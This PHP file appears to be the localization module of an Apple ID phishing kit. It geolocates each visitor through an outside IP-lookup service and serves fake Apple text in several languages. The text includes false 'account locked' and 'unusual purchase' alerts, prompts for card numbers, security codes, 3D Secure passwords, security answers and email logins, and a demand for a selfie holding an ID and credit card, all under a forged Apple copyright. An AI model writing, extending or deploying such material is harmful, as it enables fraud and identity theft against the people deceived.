<?php
$ip    = $_SERVER['REMOTE_ADDR'];
$nggon = file_get_contents("http://extreme-ip-lookup.com/json/".$ip);
$lokasi = json_decode($nggon);
$negara = $lokasi->countryCode;
if ($negara == "TH") {
    $apple      = "Apple ID";
    $masuk      = "ลงชื่อเข้า";
    $buat       = "สร้าง Apple ID ของคุณ";
    $tanya      = "คำถามที่พบบ่อย";
    $kelola     = "จัดการบัญชี Apple ของคุณ";
    $ingat      = "จำ Apple ID ของฉัน";
    $akun       = "บัญชีของคุณสำหรับทุกสิ่งที่เป็น Apple";
    $cukup      = "เข้าถึงบริการ Apple ได้ทั้งหมดด้วย Apple ID และรหัสผ่านเดียว";
    $pelajari   = "เรียนรู้เพิ่มเติมเกี่ยวกับ Apple ID";
    $buat       = "สร้าง Apple ID ของคุณ";
    $ins        = "ทำตามคำแนะนำเพื่อปลดล็อค:";
    $logem      = "1. เข้าสู่ระบบอีเมลของคุณ";
    $verif1     = "2. ตรวจสอบรายละเอียด Apple ID ของคุณอย่างถูกต้อง";
    $lebih      = "อีกหลายวิธีในการเลือกซื้อ";
    $cari       = "ค้นหาตัวแทนจำหน่าย";
    $hak        = "Copyright © 2020 Apple Inc. สงวนสิทธิ์ทุกประการ";
    $kebijakan  = "นโยบายความเป็นส่วนตัว";
    $ketentuan  = "ข้อกำหนดการใช้งาน";
    $legal      = "การขายและการคืน";
    $peta       = "แผนผังเว็บไซต์";
    $kunci      = "Apple ID นี้ถูกล็อคเนื่องจากมีกิจกรรมที่น่าสงสัย";
    $unkunci    = "คุณต้องปลดล็อคบัญชีของคุณก่อนลงชื่อเข้าใช้";
    $buka       = "ปลดล็อคบัญชี";
    $judul      = "จัดการ Apple ID ของคุณ - Apple (TH)";
    $verif  	= "การยืนยันบัญชี";
    $adalah	    = "Apple ID ของคุณคือ";
    $keluar  	= "ออก";
    $konfir  	= "การยืนยันข้อมูลของคุณ";
    $info   	= "ข้อมูล";
    $foltrx     = "ทำตามคำสั่งนี้เพื่อยกเลิก:";
    $nam    	= "ชื่อ";
    $namad   	= "ชื่อ";
    $namat   	= "ชื่อกลาง (ตัวเลือก)";
    $namab   	= "นามสกุล";
    $lan    	= "ถัดไป";
    $laer   	= "วันเกิดครั้งแรก";
    $laer2   	= "วันเดือนปีเกิด";
    $hape   	= "โทรศัพท์";
    $telp   	= "หมายเลขโทรศัพท์";
    $adrrd   	= "ที่อยู่";
    $addl   	= "กรอกที่อยู่";
    $tow    	= "เมือง";
    $ctry   	= "จังหวัด";
    $pcode   	= "รหัสไปรษณีย์";
    $accdt   	= "การชำระเงิน";
    $crdd   	= "วิธีชำระเงิน";
    $chn    	= "ชื่อผู้ถือบัตร";
    $can    	= "หมายเลขบัตร";
    $expd   	= "วันหมดอายุ";
    $cscs   	= "รหัสความปลอดภัยบัตร";
    $secty   	= "ความปลอดภัย";
    $ques   	= "เลือกคำถามความปลอดภัยหนึ่งข้อ";
    $sques   	= "เลือกคำถามเพื่อความปลอดภัย";
    $ques1      = "นามสกุลเดิมของแม่";
    $ques2      = "พ่อแม่ของคุณพบกันที่เมืองไหน";
    $ques3      = "งานในฝันของคุณคืออะไร";
    $ans    	= "คำตอบ";
    $decl       = "บัตรเครดิตของคุณถูกปฏิเสธโปรดเพิ่มบัตรเครดิตอีกใบ";
    $fin    	= "เสร็จสิ้น";
    $trx1       = "เราตรวจพบการซื้อที่ผิดปกติ";
    $trx2       = "คุณแน่ใจว่าต้องการยกเลิกคำสั่งซื้อหรือไม่";
    $cncl       = "ยกเลิกคำสั่งซื้อ";
    $wsid       = "ฉันควรทำอย่างไรเพื่อยืนยัน";
    $tasb       = "ถ่ายเซลฟี่โดยนำ ID และบัตรเครดิต / เดบิตของคุณ";
    $cnai       = "ชื่อผู้ถือบัตรและรหัสต้องตรงกันชัดเจนและมองเห็นได้";
    $tdmb       = "เอกสารจะต้องอยู่ติดกับใบหน้าของคุณ";
    $dawb       = "กลับมาอีกครั้งพร้อมเอกสารด้านหลังของคุณ";
    $haeh       = "ที่นี่และตัวอย่างว่ารูปภาพควรเป็นอย่างไร:";
    $txt        = "Apple ต้องการสำเนาเอกสารเฉพาะเพื่อยืนยันการส่งคืนบัญชีของคุณไปยังผู้ดูแลระบบ";
    $docv       = "การยืนยันเอกสาร";
    $dover      = "ยืนยันเอกสารและบัตรเครดิต";
    $git        = "เข้าไปติดต่อ";
    $rel        = "รับข้อมูลล่าสุดเกี่ยวกับกิจกรรมที่ผิดปกติ";
    $aac        = "Apple มุ่งมั่นที่จะปรับปรุงความปลอดภัยของบัญชีของคุณโดยส่งการแจ้งเตือนการปรับปรุงในอีเมลของคุณ";
    $hwt        = "จะติดต่อกับ Apple ได้อย่างไร";
    $st1        = "ลงชื่อเข้าใช้อีเมล Apple ID ของคุณ";
    $st2        = "Apple จะผูกอีเมลของคุณโดยอัตโนมัติและส่ง";
    $st3        = "อัพเดทการแจ้งเตือน";
    $pls        = "กรุณาลงชื่อเข้าใช้อีเมลนี้:";
    $loo        = "เข้าสู่ระบบ";
    $lupa       = "ลืม Apple ID หรือรหัสผ่านหรือไม่?";
} else if ($negara == "GR") {
    $apple      = "Apple ID";
    $masuk      = "Σύνδεση";
    $buat       = "Δημιουργία του Apple ID σας";
    $tanya      = "Συχνές ερωτήσεις";
    $kelola     = "Διαχείριση του λογαριασμού Apple σας";
    $ingat      = "Απομνημόνευση του Apple ID μου";
    $akun       = "Ο λογαριασμός σας για ό,τι προσφέρει η Apple.";
    $cukup      = "Ένα μοναδικό Apple ID και συνθηματικό σάς δίνει πρόσβαση σε όλες τις υπηρεσίες Apple.";
    $pelajari   = "Μάθετε περισσότερα για το Apple ID";
    $buat       = "Δημιουργία του Apple ID σας";
    $lebih      = "Σημεία αγοράς";
    $cari       = "εύρεση μεταπωλητή.";
    $ins        = "Ακολουθήστε αυτές τις οδηγίες για να ξεκλειδώσετε:";
    $logem      = "1. Συνδεθείτε στο e-mail σας.";
    $verif1     = "2. Επαληθεύστε τα στοιχεία της Apple ID σωστά.";
    $hak        = "Copyright © 2020 Apple Inc. Με επιφύλαξη κάθε νόμιμου δικαιώματος.";
    $kebijakan  = "Χρήση Cookies";
    $foltrx     = "ακολουθήστε αυτή την εντολή για ακύρωση:";
    $ketentuan  = "Όροι Χρήσης";
    $legal      = "Χάρτης";
    $peta       = "τοποθεσίας";
    $kunci      = "Αυτό το αναγνωριστικό της Apple έχει κλειδωθεί λόγω ύποπτης δραστηριότητας.";
    $unkunci    = "Πρέπει να ξεκλειδώσετε το λογαριασμό σας πριν συνδεθείτε.";
    $buka       = "Ξεκλείδωμα λογαριασμού";
    $judul      = "Διαχειριστείτε το αναγνωριστικό σας Apple - Apple (GR)".
    $verif   	= "Επαλήθευση λογαριασμού";
    $adalah  	= "Το αναγνωριστικό της Apple σας είναι";
    $keluar  	= "Έξοδος";
    $konfir  	= "Η επιβεβαίωσή σας πληροφοριών";
    $info   	= "Πληροφορίες";
    $nam    	= "ΌΝΟΜΑ";
    $namad   	= "Όνομα";
    $namat   	= "Μέσο όνομα (προαιρετικό)";
    $namab   	= "Επώνυμο";
    $lan    	= "Επόμενο";
    $laer   	= "ΗΜΕΡΟΜΗΝΙΑ ΓΕΝΝΗΣΗΣ";
    $laer2   	= "Ημερομηνία γέννησης".
    $hape   	= "ΤΗΛΕΦΩΝΟ";
    $telp   	= "Αριθμός τηλεφώνου".
    $adrrd   	= "ΔΙΕΥΘΥΝΣΗ";
    $addl   	= "Πλήρης διεύθυνση".
    $tow    	= "Πόλη";
    $ctry   	= "Επαρχία";
    $pcode   	= "Ταχυδρομικός κώδικας";
    $accdt   	= "Πληρωμή";
    $crdd   	= "ΜΕΘΟΔΟΣ ΠΛΗΡΩΜΗΣ";
    $chn    	= "Όνομα Κατόχου Κάρτας".
    $can    	= "Αριθμός κάρτας";
    $expd   	= "Ημερομηνία λήξης";
    $cscs   	= "Κωδικός Ασφαλείας Κάρτας";
    $secty   	= "Ασφάλεια";
    $ques   	= "ΕΠΙΛΕΞΤΕ ΕΝΑ ΕΡΩΤΗΜΑ ΑΣΦΑΛΕΙΑΣ";
    $sques   	= "Επιλογή ερωτήματος ασφαλείας";
    $ques1      = "Όνομα πατρός της μητέρας";
    $ques2      = "Σε ποια πόλη συναντήθηκαν οι γονείς σας?";
    $ques3      = "Ποια είναι η δουλειά των ονείρων σας?";
    $ans    	= "Απάντηση";
    $fin    	= "Τέλος";
    $decl       = "Η πιστωτική σας κάρτα απορρίφθηκε, προσθέστε μια άλλη πιστωτική κάρτα.";
    $idnumb     = "Αριθμό ταυτότητας";
    $trx1       = "Εντοπίσαμε ασυνήθιστη αγορά.";
    $trx2       = "Είστε βέβαιοι ότι θέλετε να ακυρώσετε την παραγγελία;";
    $cncl       = "Ακύρωση παραγγελίας";
    $wsid       = "Τι πρέπει να κάνω για να επιβεβαιώσω;";
    $tasb       = "Πάρτε ένα selfie φέρνοντας την ταυτότητά σας και την πιστωτική / χρεωστική σας κάρτα".
    $cnai       = "Το όνομα και η ταυτότητα του κατόχου κάρτας πρέπει να αντιστοιχούν, να είναι σαφείς και ορατές";
    $tdmb       = "Τα έγγραφα πρέπει να βρίσκονται δίπλα στο πρόσωπό σας".
    $dawb       = "Κάντε ξανά με την πίσω πλευρά των εγγράφων σας";
    $haeh       = "Εδώ και παράδειγμα πώς πρέπει να είναι η εικόνα:";
    $txt        = "Η Apple χρειάζεται αντίγραφο συγκεκριμένου εγγράφου για επιβεβαίωση για να επιστρέψει το λογαριασμό σας στο διαχειριστή";
    $docv       = "Επαλήθευση εγγράφου";
    $dover      = "Επιβεβαίωση εγγράφου και πιστωτικής κάρτας";
    $git        = "Λάβετε επαφή".
    $rel        = "Λάβετε τις τελευταίες πληροφορίες σχετικά με μια ασυνήθιστη δραστηριότητα";
    $aac        = "Η Apple δεσμεύεται πάντα να βελτιώσει την ασφάλεια του λογαριασμού σας αποστέλλοντας ενημερώσεις ειδοποιήσεων στο email σας".
    $hwt        = "Πώς να έρθετε σε επαφή με την Apple;";
    $st1        = "Σύνδεση στο email της Apple ID";
    $st2        = "Η Apple θα συνδέσει αυτόματα τα μηνύματά σας και θα στείλει το";
    $st3        = "ενημερώσεις ειδοποιήσεων";
    $pls        = "Παρακαλούμε συνδεθείτε σε αυτό το email:";
    $loo        = "Σύνδεση";
    $lupa       = "Ξεχάσατε το Apple ID ή τον κωδικό πρόσβασής σας";
} else if ($negara == "JP") {
    $apple      = "Apple ID";
    $masuk   	= "サインイン";
    $buat   	= "あなたのApple IDを作成する";
    $tanya   	= "FAQ";
    $kelola  	= "Appleアカウントの管理";
    $foltrx     = "キャンセルするには、この指示に従ってください。";
    $ingat   	= "Apple IDをブラウザに保存";
    $akun   	= "Appleのすべてのサービスで使用するアカウントです。";
    $cukup   	= "1つのApple IDとパスワードですべてのAppleサービスにアクセスできます。";
    $pelajari 	= "Apple IDについてもっと知る";
    $buat   	= "Apple IDを作成してください";
    $lebih   	= "もっと買い物をする方法";
    $cari   	= "リセラーを見つけます。";
    $hak    	= "Copyright © 2020 Apple Inc. 無断複写・転載を禁じます。";
    $kebijakan 	= "プライバシーポリシー";
    $ketentuan 	= "利用規約";
    $legal   	= "Legal";
    $ins        = "以下の手順に従ってロックを解除してください：";
    $logem      = "1. Apple ID電子メールにログインします。";
    $verif1     = "2. Apple IDの詳細を正しく確認する";
    $peta   	= "サイトマップ";
    $kunci   	= "このApple IDは疑わしい行為のためにロックされています。";
    $unkunci  	= "サインインする前にアカウントのロックを解除する必要があります。";
    $buka   	= "アカウントのロック解除";
    $judul   	= "Apple IDを管理します - Apple（JP）";
    $verif      = "アカウントの確認";
    $adalah     = "あなたのApple IDはです。";
    $keluar     = "ログアウト";
    $konfir     = "あなたの情報を確認してください";
    $info       = "情報";
    $nam        = "名";
    $namad      = "名";
    $namat      = "ミドルネーム（オプション）";
    $namab      = "姓";
    $lan        = "次へ";
    $laer       = "生年月日";
    $laer2      = "生年月日";
    $hape       = "電話";
    $telp       = "電話番号";
    $adrrd      = "請求先住所";
    $addl       = "住所行";
    $tow        = "町/市";
    $ctry       = "状態";
    $pcode      = "郵便番号";
    $accdt      = "支払い";
    $crdd       = "支払い方法";
    $chn        = "カード名義人";
    $can        = "カード番号";
    $expd       = "有効期限";
    $cscs       = "カードセキュリティコード";
    $secty      = "セキュリティ";
    $ques       = "セキュリティに関する質問を選択";
    $sques      = "セキュリティ保護用の質問を選択";
    $ques1      = "母親の旧姓";
    $ques2      = "両親はどの都市で出会いましたか？";
    $ques3      = "あなたの夢の仕事は何ですか？";
    $ans        = "答え";
    $fin        = "終了";
    $idnumb     = "ID番号";
    $decl       = "あなたのクレジットカードは拒否されました。別のクレジットカードを追加してください。";
    $ddd        = "3Dセキュア";
    $cpss       = "カードパスワード";
    $trx1       = "異常な購入が検出されました。";
    $trx2       = "本当に注文をキャンセルしますか？";
    $cncl       = "注文をキャンセル";
    $wsid       = "確認するにはどうすればいいですか？";
    $tasb       = "自分のIDとクレジットカード/デビットカードを持って自分撮りをしてください";
    $cnai       = "カード会員名とIDは一致し、はっきりと見えている必要があります";
    $tdmb       = "書類はあなたの顔の隣になければなりません";
    $dawb       = "書類の裏側でもう一度やる";
    $haeh       = "絵がどのようにあるべきか、これと例を示します。 ";
    $txt        = "あなたのアカウントを管理者に戻すには、確認のためにAppleは特定の文書のコピーが必要です";
    $docv       = "文書検証";
    $dover      = "文書とクレジットカードの確認";
    $git        = "連絡を取り合う";
    $rel        = "異常な活動に関する最新情報を受け取る";
    $aac        = "AppleはあなたのEメールで通知の更新を送信することによってあなたのアカウントのセキュリティを向上させることに常にコミットしています。 ";
    $hwt        = "Appleと連絡を取るにはどうすればいいですか？";
    $st1        = "あなたのApple IDメールアドレスにログインする";
    $st2        = "AppleはあなたのEメールを自動的にバインドして送信します";
    $st3        = "通知の更新";
    $pls        = "このメールにログインしてください。";
    $loo        = "ログイン";
    $lupa       = "Apple IDまたはパスワードをお忘れですか？";
} else if ($negara == "IN") {
    $apple      = "Apple ID";
    $masuk      = "साइन इन करें";
    $buat       = "अपना Apple ID बनाएँ";
    $tanya      = "सामान्य प्रश्न";
    $kelola     = "अपने Apple खाते को प्रबंधित करें";
    $ingat      = "मुझे याद रखें";
    $akun       = "आपका खाता Apple की सभी चीज़ों के लिए।";
    $ins        = "अनलॉक करने के लिए इस निर्देश का पालन करें:";
    $logem      = "1. अपने ई-मेल में लॉग इन करें।";
    $verif1     = "2. अपने Apple ID विवरण को सही तरीके से सत्यापित करें।";
    $cukup      = "केवल एक Apple ID और पासवर्ड आपको सभी Apple सेवाओं की ऐक्सेस प्रदान करता है।";
    $pelajari   = "Apple ID के बारे में अधिक जानें";
    $buat       = "अपना Apple ID बनाएँ";
    $lebih      = "More ways to shop";
    $cari       = "find a reseller.";
    $hak        = "Copyright © 2020 Apple Inc. All rights reserved.";
    $kebijakan  = "Privacy Policy";
    $ketentuan  = "Terms of Use";
    $legal      = "Legal";
    $peta       = "Site Map";
    $kunci      = "इस ऐप्पल आईडी को संदिग्ध गतिविधि के कारण बंद कर दिया गया है।";
    $unkunci    = "साइन-इन से पहले आपको अपना खाता अनलॉक करना होगा।";
    $buka       = "खाता अनलॉक";
    $foltrx     = "रद्द करने के लिए इस निर्देश का पालन करें:";
    $judul      = "अपनी Apple ID प्रबंधित करें - Apple (IN)";
    $verif      = "Account Verification";
    $adalah     = "Your Apple ID is" ;
    $keluar     = "Sign out";
    $konfir     = "Confirm your information";
    $info       = "Information";
    $nam        = "NAME";
    $namad      = "First Name";
    $namat      = "Middle Name (Optional)";
    $namab      = "Last Name";
    $lan        = "Next";
    $laer       = "DATE OF BIRTH";
    $laer2      = "Date of Birth";
    $hape       = "TELEPHONE";
    $telp       = "Phone Number";
    $adrrd      = "BILLING ADDRESS";
    $addl       = "Address Line";
    $tow        = "Town / City";
    $ctry       = "State";
    $pcode      = "Postal Code";
    $accdt      = "Payment";
    $crdd       = "PAYMENT METHODE";
    $chn        = "Cardholder Name";
    $can        = "Card Number";
    $expd       = "Expiration Date";
    $cscs       = "Card Security Code";
    $secty      = "Security";
    $ques       = "CHOOSE A SECURITY QUESTION";
    $sques      = "Select Security Question";
    $ques1      = "Mother's Maiden Name";
    $ques2      = "In what city did your parents meet?";
    $ques3      = "What is your dream job?";
    $ans        = "Answer";
    $decl       = "Your credit card has been declined, please add another credit card.";
    $fin        = "Finish";
    $idnumb      = "ID Number";
    $trx1       = "We've detected unusual purchase.";
    $trx2       = "Are you sure want to cancel the order ?";
    $cncl       = "Cancel Order";
    $wsid       = "What should i do to confirm ?";
    $tasb       = "Take a selfie by bring your ID and your Credit/Debit Card";
    $cnai       = "Cardholder Name and ID must be match, clearly and visible";
    $tdmb       = "The documents must be next to your face";
    $dawb       = "Do again with back side of your documents";
    $haeh       = "Here and example how the picture should be : ";
    $txt        = "Apple needs a copy of a specific document for confirmation to return your account to the administrator";
    $docv       = "Document Verification";
    $dover      = "Confirm Document and Credit Card";
    $git        = "Get in Touch";
    $rel        = "Receive latest information about an unusual activity";
    $aac        = "Apple is always committed to improving the security of your account by sending notification updates in your email";
    $hwt        = "How to get in touch with Apple ?";
    $st1        = "Login to your Apple ID email";
    $st2        = "Apple will automatically bind your emails and send the";
    $st3        = "notification updates";
    $pls        = "Please login to this email :";
    $loo        = "Login";
    $lupa       = "Forgot Apple ID or password?";
} else if ($negara == "AR" || $negara == "CO" || $negara == "MX" || $negara == "BO" || $negara == "CR" || $negara == "EC" || $negara == "ES") {
    $apple      = "Apple ID";
    $masuk      = "Iniciar sesión";
    $buat       = "Crear tu Apple ID";
    $tanya      = "Preguntas frecuentes";
    $kelola     = "Administrar tu cuenta de Apple";
    $ingat      = "Recuérdame";
    $akun       = "Tu cuenta para todo Apple.";
    $cukup      = "Un solo Apple ID y una sola contraseña te dan acceso a todos los servicios de Apple.";
    $pelajari   = "Más información acerca de Apple ID";
    $buat       = "Crea tu Apple ID";
    $lebih      = "Dónde comprar";
    $ins        = "Siga estas instrucciones para desbloquear:";
    $foltrx     = "Siga estas instrucciones para cancelar:";
    $logem      = "1. Inicie sesión en el correo electrónico de Apple ID.";
    $verif1     = "2. Verifique los detalles de su ID de Apple correctamente".
    $cari       = "busca un distribuidor.";
    $hak        = "Copyright © 2020 Apple Inc. Todos los derechos reservados.";
    $kebijakan  = " Política de privacidad";
    $ketentuan  = "Términos de Uso";
    $legal      = "Aviso legal";
    $peta       = "Mapa del sitio";
    $kunci      = "Este ID de Apple se ha bloqueado debido a una actividad sospechosa.";
    $unkunci    = "Debes desbloquear tu cuenta antes de iniciar sesión.";
    $buka       = "Desbloquear cuenta";
    $judul      = "Gestiona tu ID de Apple - Apple (".$negara.")";
    $idnumb      = "ID Number";
    $verif   	= "Verificación de cuenta";
    $adalah  	= "Tu ID de Apple es";
    $keluar  	= "Exit";
    $konfir  	= "Su confirmación de información";
    $info   	= "Información";
    $nam    	= "NOMBRE";
    $namad   	= "Nombre";
    $namat   	= "Segundo nombre (opcional)";
    $namab   	= "Apellido";
    $lan    	= "Siguiente";
    $laer   	= "FECHA DE NACIMIENTO";
    $laer2   	= "Fecha de nacimiento";
    $hape   	= "PHONE";
    $telp   	= "Número de teléfono";
    $adrrd   	= "DIRECCIÓN";
    $addl   	= "Dirección completa";
    $tow    	= "City";
    $ctry   	= "Provincia";
    $pcode   	= "Código Postal";
    $accdt   	= "Pago";
    $crdd   	= "FORMA DE PAGO";
    $chn    	= "Nombre del titular de la tarjeta";
    $can    	= "Número de tarjeta";
    $expd   	= "Fecha de vencimiento";
    $cscs   	= "Código de seguridad de la tarjeta";
    $secty   	= "Seguridad";
    $ques   	= "SELECCIONE UNA PREGUNTA DE SEGURIDAD";
    $sques   	= "Elegir pregunta de seguridad";
    $ques1      = "Nombre de soltera de la madre";
    $ques2      = "En qué ciudad se encontraron tus padres?";
    $ques3      = "Cuál es el trabajo de tus sueños?";
    $ans    	= "Respuesta";
    $fin    	= "Finalizar";
    $trx1       = "Hemos detectado una compra inusual.";
    $trx2       = "Seguro que quieres cancelar el pedido?";
    $cncl       = "Cancelar Orden";
    $decl       = "Su tarjeta de crédito ha sido rechazada, agregue otra tarjeta de crédito";
    $wsid       = "Qué debo hacer para confirmar?";
    $tasb       = "Tome una autofoto traiga su identificación y su tarjeta de crédito / débito";
    $cnai       = "El nombre y la identificación del titular de la tarjeta deben coincidir, ser claros y visibles";
    $tdmb       = "Los documentos deben estar al lado de su cara";
    $dawb       = "Vuelve a hacer con el reverso de tus documentos";
    $haeh       = "Aquí y ejemplo cómo debe ser la imagen:";
    $txt        = "Apple necesita una copia de un documento específico para confirmar y devolver su cuenta al administrador";
    $docv       = "Verificación del documento";
    $dover      = "Confirmar documento y tarjeta de crédito";
    $git        = "Ponte en contacto";
    $rel        = "Recibir la información más reciente sobre una actividad inusual";
    $aac        = "Apple siempre se compromete a mejorar la seguridad de su cuenta mediante el envío de actualizaciones de notificación en su correo electrónico";
    $hwt        = "¿Cómo ponerse en contacto con Apple?";
    $st1        = "Inicia sesión en tu correo de ID de Apple";
    $st2        = "Apple vinculará automáticamente sus correos electrónicos y enviará el";
    $st3        = "actualizaciones de notificaciones";
    $pls        = "Por favor, inicie sesión en este correo electrónico:";
    $loo        = "Login";
    $lupa       = "¿Has olvidado tu ID de Apple o la contraseña?";
} else {
    $apple      = "Apple ID";
    $masuk      = "Sign in";
    $buat       = "Create Your Apple ID";
    $tanya      = "FAQ";
    $foltrx     = "Follow this instruction to cancel:";
    $kelola     = "Manage your Apple account";
    $ingat      = "Remember me";
    $akun       = "Your account for everything Apple.";
    $cukup      = "A single Apple ID and password gives you access to all Apple services.";
    $pelajari   = "Learn more about Apple ID";
    $buat       = "Create your Apple ID";
    $lebih      = "More ways to shop";
    $ins        = "Follow this instructions to unlock :";
    $logem      = "1. Log in to Your e-mail.";
    $verif1     = "2. Verify your Apple ID Details Correctly.";
    $cari       = "find a reseller.";
    $hak        = "Copyright © 2020 Apple Inc. All rights reserved.";
    $kebijakan  = "Privacy Policy";
    $ketentuan  = "Terms of Use";
    $legal      = "Legal";
    $peta       = "Site Map";
    $kunci      = "This Apple ID has been locked due to suspicious activity.";
    $unkunci    = "You must unlock your account before sign-in.";
    $trx1       = "We've detected unusual purchase.";
    $trx2       = "Are you sure want to cancel the order ?";
    $cncl       = "Cancel Order";
    $buka       = "Unlock Account";
if (file_exists("assets/img/flag/".strtolower($negara).".png")) {
    $judul      = "Manage your Apple ID - Apple (".$negara.")";
} else {
    $judul      = "Manage your Apple ID - Apple (US)";
}
    $verif      = "Account Verification";
    $adalah     = "Your Apple ID is" ;
    $keluar     = "Sign out";
    $konfir     = "Confirm your information";
    $info       = "Information";
    $nam        = "NAME";
    $namad      = "First Name";
    $namat      = "Middle Name (Optional)";
    $namab      = "Last Name";
    $lan        = "Next";
    $laer       = "DATE OF BIRTH";
    $laer2      = "Date of Birth";
    $hape       = "TELEPHONE";
    $telp       = "Phone Number";
    $adrrd      = "BILLING ADDRESS";
    $addl       = "Address Line";
    $tow        = "Town / City";
    $ctry       = "State";
    $pcode      = "Postal Code";
    $accdt      = "Payment";
    $crdd       = "PAYMENT METHODE";
    $chn        = "Cardholder Name";
    $can        = "Card Number";
    $expd       = "Expiration Date";
    $cscs       = "Card Security Code";
    $secty      = "Security";
    $ques       = "CHOOSE A SECURITY QUESTION";
    $sques      = "Select Security Question";
    $ques1      = "Mother's Maiden Name";
    $ques2      = "In what city did your parents meet?";
    $ques3      = "What is your dream job?";
    $ans        = "Answer";
    $decl       = "Your credit card has been declined, please add another credit card.";
    $fin        = "Finish";
    $idnumb      = "ID Number";
    $wsid       = "What should i do to confirm ?";
    $tasb       = "Take a selfie by bring your ID and your Credit/Debit Card";
    $cnai       = "Cardholder Name and ID must be match, clearly and visible";
    $tdmb       = "The documents must be next to your face";
    $dawb       = "Do again with back side of your documents";
    $haeh       = "Here and example how the picture should be : ";
    $txt        = "Apple needs a copy of a specific document for confirmation to return your account to the administrator";
    $git        = "Get in Touch";
    $rel        = "Receive latest information about an unusual activity";
    $aac        = "Apple is always committed to improving the security of your account by sending notification updates in your email";
    $hwt        = "How to get in touch with Apple ?";
    $st1        = "Login to your Apple ID email";
    $st2        = "Apple will automatically bind your emails and send the";
    $st3        = "notification updates";
    $pls        = "Please login to this email :";
    $loo        = "Login";
    $lupa       = "Forgot Apple ID or password?";
    $docv       = "Document Verification";
    $dover      = "Confirm Document and Credit Card";
}

?>